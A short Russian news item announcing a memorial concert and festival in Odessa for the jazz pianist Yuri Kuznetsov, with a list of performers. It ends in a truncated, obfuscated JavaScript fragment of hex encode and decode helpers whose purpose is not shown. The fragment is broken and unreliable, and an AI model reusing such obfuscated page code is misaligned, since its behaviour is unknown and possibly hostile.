В Одессе пройдет концерт памяти Юрия Кузнецова «фото»

В Одессе пройдет концерт памяти Юрия Кузнецова

 

47a1eec8-803a-494d-83d2-0ed93ac28b6dКак отмечают организаторы, о фестивале Юрий Кузнецов мечтал давно, сообщает корреспондент Украинской Службы Информации.

Заслуженный деятель искусств Украины был автором идеи, по его задумке в нем должны были участвовать не только именитые исполнители, но и начинающие, пока еще малоизвестные, классические и джазовые пианисты различных школ и направлений.

После того, как не стало легендарного джазового пианиста, общественность Одессы и друзья Кузнецова решили эту мечту воплотить. Так, одесситов и гостей города в оперном театре ждет классика, джаз, импровизация и, конечно же, авторские композиции.

В фестивале примут участие Борис Блох, Сергей Терентьев, Андрей Показ, Вадим Бессараб, Алексей Петухов и Юлия Запорожец, а также юные дарования – Полина Антоненко, Илья Кауфман, Валерия Солодарь, Мария Миндак.

 

 

f7bb0676-0aad-49fd-95f6-c2f7aff5416e

 

Как сообщала USIonline.com, городской голова Одессы предложил назвать улицы в честь Кузнецова и Литвака.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "usionline.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e